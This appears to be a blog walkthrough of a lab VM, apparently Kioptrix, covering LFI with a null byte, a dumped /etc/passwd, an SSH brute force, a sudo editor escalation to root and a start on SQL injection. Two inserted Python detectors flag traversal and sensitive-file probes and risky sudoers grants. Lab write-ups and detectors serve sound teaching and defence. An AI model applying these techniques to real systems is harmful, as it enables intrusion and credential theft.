<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxG2xozWdFdn9Y0CHJ3fn0aY1IZu-VgVBetsjFEvZYxwgpkCN7OTiGRKQtBfhR3yMSIbNpQ5TPNE85if9DE40EkoK6URgXkoI3JCSz_4Ax9HY_Xzo7LITIf3-uji8eZt-hYoLR5vR2vpU/s1600/web1.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxG2xozWdFdn9Y0CHJ3fn0aY1IZu-VgVBetsjFEvZYxwgpkCN7OTiGRKQtBfhR3yMSIbNpQ5TPNE85if9DE40EkoK6URgXkoI3JCSz_4Ax9HY_Xzo7LITIf3-uji8eZt-hYoLR5vR2vpU/s400/web1.png" width="400" /></a><br />
<br />
There wasn't a robots.txt file giving any hidden directories away, so I carried on perusing the content to see if there was any more info:<br />
<br />
I noticed the URL for the blog was interesting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFbtaHbT6Fx5PN5DLu1Qp7uAS_CrpXgAnOgKE4KTS3mLLO6wFt9g8zZBxLxjQHQLDpSveiFOiDjSwH0frs0PFWjUat6L7SI2gnDFl5tF1422Xw7x7jsOmszauc2NdX8SN31nfuIiR2H8/s1600/Screenshot+from+2017-02-13+12-07-09.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFbtaHbT6Fx5PN5DLu1Qp7uAS_CrpXgAnOgKE4KTS3mLLO6wFt9g8zZBxLxjQHQLDpSveiFOiDjSwH0frs0PFWjUat6L7SI2gnDFl5tF1422Xw7x7jsOmszauc2NdX8SN31nfuIiR2H8/s400/Screenshot+from+2017-02-13+12-07-09.png" width="400" /></a></div>
<br />
I wondered if I could manipulate it to give me information. First of all I tried some local file inclusion (LFI):<br />
<br />
This took some tinkering, as just adding a null byte () didn't work. I had to insert a character after the null byte in order for it to yield a result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWzztIOdZt1mXzHgzR2Xdtw-W5FVZjBU0BDwyF76KxU20yBfbiLfU3Mzbr_DZQgMAK7JCcl43Bveif3T9-iGf_ZwFDXQz2mSBj1ydnc9wpWtql1mwLuDqmQ2rYxHvIeCJw1lby9PHgXWE/s1600/Screenshot+from+2017-02-14+11-23-39.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWzztIOdZt1mXzHgzR2Xdtw-W5FVZjBU0BDwyF76KxU20yBfbiLfU3Mzbr_DZQgMAK7JCcl43Bveif3T9-iGf_ZwFDXQz2mSBj1ydnc9wpWtql1mwLuDqmQ2rYxHvIeCJw1lby9PHgXWE/s400/Screenshot+from+2017-02-14+11-23-39.png" width="400" /></a></div>
<br />
This made me think about a way to automate the task. After looking around on the web I found this code on a <a href="https://www.homelab.it/index.php/2014/08/26/alfi-scanner-an0th3r-lfi-sc4nn3r-v1-0/">BLOG</a>. I noticed it only scanned for conventional LFI, so I amended it to my needs. The code can be found <a href="https://github.com/monkeysm8/CTF-Stuff/blob/master/LFI_Scanner.py">HERE</a>. When I ran it, it gave me the results quickly:<br />
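As an added example, not the post's own scanner, here is the defender's side of the same probing: detection logic run over constructed Apache access-log lines (the `page` parameter name, IPs and timestamps are placeholders, not the VM's real values). Each query value is percent-decoded until it stops changing, so the plain null byte the post mentions, a null byte with a character appended after it, and double-encoded traversal all get flagged.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format lines; 'page' and the addresses are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Feb/2017:11:23:39 +0000] "GET /index.php?page=blog HTTP/1.1" 200 5120
192.0.2.10 - - [14/Feb/2017:11:23:41 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1834
192.0.2.10 - - [14/Feb/2017:11:23:42 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 500 0
192.0.2.10 - - [14/Feb/2017:11:23:44 +0000] "GET /index.php?page=../../../../etc/passwd%00.php HTTP/1.1" 200 1834
192.0.2.10 - - [14/Feb/2017:11:23:45 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1834
192.0.2.11 - - [14/Feb/2017:11:24:01 +0000] "GET /gallery/?sort=name HTTP/1.1" 200 2300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Files an include parameter has no business pointing at.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")


def deep_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %252e%252e%252f
    (double-encoded ../) is seen for what it is."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> list:
    """Return the reasons a single query-string value looks like an LFI probe."""
    v = deep_decode(value)
    reasons = []
    if "\x00" in v:                       # %00 alone or %00 followed by a suffix
        reasons.append("null-byte")
    if "../" in v or "..\\" in v:         # directory traversal
        reasons.append("traversal")
    if any(s in v for s in SENSITIVE):    # well-known target files
        reasons.append("sensitive-file")
    return reasons


def scan_log(text: str) -> list:
    """Parse combined-format lines and report every parameter that trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "status": int(m.group("status")),
                    "param": name,
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 500 followed by a 200 from the same client on the same parameter, as in the sample, is the server-side view of the "add a character after the null byte" adjustment the post describes.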
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V0KrtLyydwPFRbOM-utA-F3c0dJ6nAWlHtpyvwD5TmYK0lZgto72r7Ffbjin5Q-vsrzKCP87Yp2ZHlzda39kgBpHJ5dwm-qmKZLK77XAdKXN9Y8Oltl2yh91RyqBsjUcroOzEjrm09Q/s1600/Screenshot+from+2017-02-14+11-28-20.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V0KrtLyydwPFRbOM-utA-F3c0dJ6nAWlHtpyvwD5TmYK0lZgto72r7Ffbjin5Q-vsrzKCP87Yp2ZHlzda39kgBpHJ5dwm-qmKZLK77XAdKXN9Y8Oltl2yh91RyqBsjUcroOzEjrm09Q/s400/Screenshot+from+2017-02-14+11-28-20.png" width="400" /></a></div>
<br />
That was a useful learning point for me, as my coding isn't the greatest. So what did the LFI give me?<br />
<br />
Two users that are of interest:<br />
<br />
<pre class="brush: bash">root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
</pre>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dhcp:x:101:102::/nonexistent:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">syslog:x:102:103::/home/syslog:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">klog:x:103:104::/home/klog:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin</span></div>
<div style="text-align: justify;">
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash</b></span></div>
<div style="text-align: justify;">
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash</b></span></div>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">I couldn't pull the shadow file to grab their login creds, but I could have a go at brute forcing my way in via ssh.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Unfortunately Hydra was playing up and kept giving me errors but it wasn't an issue as I could use <a href="http://tools.kali.org/password-attacks/patator">Patator</a>.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwAIIhX14qF_bHoA6MrPh5r8yqysXPfdN2-rP3HwPPjNuuIj52_GC9OxnM0y99IXxFBBIx7a6c3OBaQrvDhr4ub3KXL-u9BdImWO_hW42A6fTBtJ5LHLSCw0zMt7meDRxXq3KFroNwSc/s1600/Screenshot+from+2017-02-14+17-01-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwAIIhX14qF_bHoA6MrPh5r8yqysXPfdN2-rP3HwPPjNuuIj52_GC9OxnM0y99IXxFBBIx7a6c3OBaQrvDhr4ub3KXL-u9BdImWO_hW42A6fTBtJ5LHLSCw0zMt7meDRxXq3KFroNwSc/s640/Screenshot+from+2017-02-14+17-01-58.png" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">I now had some creds I could use to SSH across.</span><br />
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">I use loneferret's account first (it was first in the list)</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6gg92pzgFiSctthVYT584fGoc6LyTghJvAbWSW1_ORopYBzHvUlfhEsKC4vSwWLlNLHtXJcbbxNoyfa-gokl0XlTpe109JOK1sbw-DPTG9995E6k8FMcmYshekcjlCdkR6u8hJtkc_sw/s1600/Screenshot+from+2017-02-15+11-03-32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6gg92pzgFiSctthVYT584fGoc6LyTghJvAbWSW1_ORopYBzHvUlfhEsKC4vSwWLlNLHtXJcbbxNoyfa-gokl0XlTpe109JOK1sbw-DPTG9995E6k8FMcmYshekcjlCdkR6u8hJtkc_sw/s400/Screenshot+from+2017-02-15+11-03-32.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Let's have a look at what's inside the folder I am in:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQbN7ZaZ2XUJhATy7qu9z_aHsHCnY0A0MNn4YDxMqjQaxtaUMFbUYpY1UQY3CVQ2EBMuM1jwRqCuAEhmgmAE5hWPkH8tEbmCEMETU-uxgW0QTx94v_SAHJ_mUxy25dbJjayyB9rs_E57o/s1600/Screenshot+from+2017-02-15+11-05-57.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQbN7ZaZ2XUJhATy7qu9z_aHsHCnY0A0MNn4YDxMqjQaxtaUMFbUYpY1UQY3CVQ2EBMuM1jwRqCuAEhmgmAE5hWPkH8tEbmCEMETU-uxgW0QTx94v_SAHJ_mUxy25dbJjayyB9rs_E57o/s400/Screenshot+from+2017-02-15+11-05-57.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span><br />
<span style="font-family: inherit;">Looks like the home directory to me!</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Reading the CompanyPolicy.README showed the "sudo ht" command. I ran it to see what this was, unfortunately I had an issue with my terminal type so I amended it:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioRYL8Bm7Ymz2-sFlUQGR_fbA31OuDTZXjEV3D9mTMRSCMncHawClEpXFohlJEEfinfn1E3AAqdYlwOstAh3jW2m6yVTcMDgh52aHLd2jMYPqUN9XHt1GfpvqxMp6rdHagRURv3viG6kw/s1600/Screenshot+from+2017-02-15+11-16-50.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioRYL8Bm7Ymz2-sFlUQGR_fbA31OuDTZXjEV3D9mTMRSCMncHawClEpXFohlJEEfinfn1E3AAqdYlwOstAh3jW2m6yVTcMDgh52aHLd2jMYPqUN9XHt1GfpvqxMp6rdHagRURv3viG6kw/s400/Screenshot+from+2017-02-15+11-16-50.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have an editor with root privs. COOL!!! I wonder if I can edit the /etc/sudoers file?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFO19aJ7ur-n82EFVsXw9mdSBbnogld0CHBVLpm7ZD3MP1HLNvwGUugyEdNC4wPZpkUXsAwQ2XKiqxySd2yVCpSurDHIjGsWJ4X-bPpvLYo8Kh1uRbgkWXhiVbK-uzAWjGbM0GDvzGo8/s1600/Screenshot+from+2017-02-15+11-18-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFO19aJ7ur-n82EFVsXw9mdSBbnogld0CHBVLpm7ZD3MP1HLNvwGUugyEdNC4wPZpkUXsAwQ2XKiqxySd2yVCpSurDHIjGsWJ4X-bPpvLYo8Kh1uRbgkWXhiVbK-uzAWjGbM0GDvzGo8/s400/Screenshot+from+2017-02-15+11-18-07.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
That's a big yes!!<br />
<br />
So, save and exit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSP_VPrbk_y-L5JItbGlzfYftDZhSiZxO8PeGNGU41gUEjwuAAIiJcXntT1Cark_YgnWFmqYbHMk0ki_G-F7H_hDHzDvCTrMc_JDZXkFvXtJaP7ZuxODkQGaoURROUxiqAZ6ve04joc8/s1600/Screenshot+from+2017-02-15+11-39-00.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSP_VPrbk_y-L5JItbGlzfYftDZhSiZxO8PeGNGU41gUEjwuAAIiJcXntT1Cark_YgnWFmqYbHMk0ki_G-F7H_hDHzDvCTrMc_JDZXkFvXtJaP7ZuxODkQGaoURROUxiqAZ6ve04joc8/s400/Screenshot+from+2017-02-15+11-39-00.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I am root!! It looks like the HT editor is susceptible to a <a href="https://www.exploit-db.com/exploits/22683/">Buffer Overflow</a>.<br />
<br />
However, when I tried to run the exploit on the server I got an error with the Perl version. I will revisit this again. Now on to the other methods of rooting this box.<br />
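How a defender would spot the grant that made this possible: an added example (not code from the post or from Kioptrix) that parses sudoers-style lines and flags commands such as ht that can write any file or escape to a shell as root. The sudoers text inside it is constructed, since the post does not show the real file, and the function names are my own.

```python
"""Audit sudoers entries for grants that hand a user an editor or other
binary that can rewrite files or escape to a shell as root, which is how
"sudo ht" became root on this box. Added example, not code from the post
or from Kioptrix; the sudoers text below is constructed for the demo."""
import re

# Binaries that, once running as root, let the caller write any file or
# spawn a shell. ht is the one found on the box; the others are common.
SHELL_ESCAPE_BINARIES = {
    "ht", "vi", "vim", "nano", "ed", "emacs", "less", "more", "man",
    "awk", "find", "perl", "python", "bash", "sh",
}

# Constructed sample: the post does not show the real /etc/sudoers.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root        ALL=(ALL) ALL
loneferret  ALL=(ALL) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg        ALL=(ALL) /usr/bin/apt-get
%admin      ALL=(ALL) ALL
"""

# user_or_group  host=(runas) [TAG: ...] command, command
ENTRY_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per user/group specification line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        entries.append({
            "who": m.group("who"),
            "runas": (m.group("runas") or "root").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries


def risky_grants(entries):
    """Flag grants that run as root and resolve to a shell-escapable binary."""
    findings = []
    for e in entries:
        if e["runas"] not in ("ALL", "root") or e["who"] == "root":
            continue
        for cmd in e["commands"]:
            if cmd.startswith("!"):          # a denial, not a grant
                continue
            if cmd == "ALL":
                findings.append((e["who"], cmd, "unrestricted root"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                reason = "editor/shell escape"
                if e["nopasswd"]:
                    reason += " without a password"
                findings.append((e["who"], cmd, reason))
    return findings


if __name__ == "__main__":
    for who, cmd, why in risky_grants(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who:12} {cmd:28} {why}")
```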
<br />
<b><u>SQLi</u></b><br />
<br />
The blog indicates there is a gallery:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9b9GsH65_Dyn-50Xxppu2UDy-2L5zscEQgt3sVRO7N4dMpyBdNAlQaEwbPMqEwdDs4okgImL_SGgrjc94wpB-yEorRb52BeGjF1G7VvGalNVsdC7AbhL0UL3thyphenhyphenGjxC9-j2ZKsid94Ik/s1600/web2.png" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9b9GsH65_Dyn-50Xxppu2UDy-2L5zscEQgt3sVRO7N4dMpyBdNAlQaEwbPMqEwdDs4okgImL_SGgrjc94wpB-yEorRb52BeGjF1G7VvGalNVsdC7AbhL0UL3thyphenhyphenGjxC9-j2ZKsid94Ik/s400/web2.png" width="400" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtleAOp9ZcBQ-44ADGPUPl8gwzWRvyOmNQmd_JCR9N2lGiyCXTFZSPm-UDJuGkNxdv8yLQOlbm8UeGQzRxKHTyGIMK8qF4ZDibfRqJSXh0z812OVzCrx9SWvyoXUJgLYwSP1-HcBImSo/s1600/Screenshot+from+2017-02-13+11-59-42.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtleAOp9ZcBQ-44ADGPUPl8gwzWRvyOmNQmd_JCR9N2lGiyCXTFZSPm-UDJuGkNxdv8yLQOlbm8UeGQzRxKHTyGIMK8qF4ZDibfRqJSXh0z812OVzCrx9SWvyoXUJgLYwSP1-HcBImSo/s400/Screenshot+from+2017-02-13+11-59-42.png" width="400" /></a></div>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
Now I wonder what awaits me here?<br />
<br />
After looking around I came to this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWQFGspcD6ktl5uqh-x99NzTwZBhLCt6ORw5RBGFRCaqfdGuPfbv-yDgOH3lEl2EAGKWPxki_cQQgmqZnhr2_t4w-lIIOeZHJyrSD6hXumxJcrjijtfdWaR67xPtvaUTWkadLzDSExu8c/s1600/Screenshot+from+2017-02-13+12-04-30.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWQFGspcD6ktl5uqh-x99NzTwZBhLCt6ORw5RBGFRCaqfdGuPfbv-yDgOH3lEl2EAGKWPxki_cQQgmqZnhr2_t4w-lIIOeZHJyrSD6hXumxJcrjijtfdWaR67xPtvaUTWkadLzDSExu8c/s400/Screenshot+from+2017-02-13+12-04-30.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The URL here looks interesting:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg20xOERgUOxN_p8JTfAOfox_hNx_JgwuDOD971TkCDDXBoEXuws6q71ftdV1nz2btpoOZKy2AFTOXUvBGAYlbARS9NvxzzI0QCst9665EX57ycXxJsYNf9q5vRispbLdrpZtAPtcjKlKU/s1600/Screenshot+from+2017-02-13+12-05-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg20xOERgUOxN_p8JTfAOfox_hNx_JgwuDOD971TkCDDXBoEXuws6q71ftdV1nz2btpoOZKy2AFTOXUvBGAYlbARS9NvxzzI0QCst9665EX57ycXxJsYNf9q5vRispbLdrpZtAPtcjKlKU/s400/Screenshot+from+2017-02-13+12-05-58.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
I wonder if I can inject?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCTuNmQv4SCMltvZg5Hhqmq9t8QxZFrAuhutNF2Rh9vgmFfqItb_5LuVI0ir_iS7ruAYDOb_bFHdC5JCwwkypJ8Iaczi8j1p-SuNfq-wTO5fbl1o1VyfheikuLgkggfBtULLNHt4DvlU/s1600/Screenshot+from+2017-02-15+11-59-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCTuNmQv4SCMltvZg5Hhqmq9t8QxZFrAuhutNF2Rh9vgmFfqItb_5LuVI0ir_iS7ruAYDOb_bFHdC5JCwwkypJ8Iaczi8j1p-SuNfq-wTO5fbl1o1VyfheikuLgkggfBtULLNHt4DvlU/s400/Screenshot+from+2017-02-15+11-59-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yup!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-9BoHEKfPic6F_Pf7ypgymlAz9brVKHsUjlaurqP0XsmLmLU8d5SWnE9di9uWs-kr2je71TTrYCAykvDdJAtewsir59HblUIckOfe3-e103W7IkqzbQMNuMcJUQ9dPcplWHGbI54fWhE/s1600/Screenshot+from+2017-02-15+12-01-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-9BoHEKfPic6F_Pf7ypgymlAz9brVKHsUjlaurqP0XsmLmLU8d5SWnE9di9uWs-kr2je71TTrYCAykvDdJAtewsir59HblUIckOfe3-e103W7IkqzbQMNuMcJUQ9dPcplWHGbI54fWhE/s400/Screenshot+from+2017-02-15+12-01-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like there are 6 columns to peruse:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPm0nltAiuUcLY_-jvi2v5m1e4OOw73DjO2fx_pRRTW6J8UK2OrwwqZj9qJBO1_IR9bkqR9fwzdmziV_pNRHx7ktIKgtgcbGJdADSnHlIhyphenhyphenWr_YtuG1Ptr7KUbYtxyjBoLsYN__o97U50/s1600/Screenshot+from+2017-02-15+12-02-52.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPm0nltAiuUcLY_-jvi2v5m1e4OOw73DjO2fx_pRRTW6J8UK2OrwwqZj9qJBO1_IR9bkqR9fwzdmziV_pNRHx7ktIKgtgcbGJdADSnHlIhyphenhyphenWr_YtuG1Ptr7KUbYtxyjBoLsYN__o97U50/s400/Screenshot+from+2017-02-15+12-02-52.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And column 2 is vulnerable to injection!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwNape0sxUNhcmARdY9txpjiAm2Qnn5EizRDjekYmabYb_MRERJme3mWBsl39eUcppM0w-uNBGX6FdZmYNKTWfRtEJJyCT46ZnQTl6QVSDjdSEndNy2Pz7ZL3Hbb0-eEo3KnH_GiwO598/s1600/Screenshot+from+2017-02-15+12-03-14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwNape0sxUNhcmARdY9txpjiAm2Qnn5EizRDjekYmabYb_MRERJme3mWBsl39eUcppM0w-uNBGX6FdZmYNKTWfRtEJJyCT46ZnQTl6QVSDjdSEndNy2Pz7ZL3Hbb0-eEo3KnH_GiwO598/s400/Screenshot+from+2017-02-15+12-03-14.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have a MySQL DB running on an Ubuntu server.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
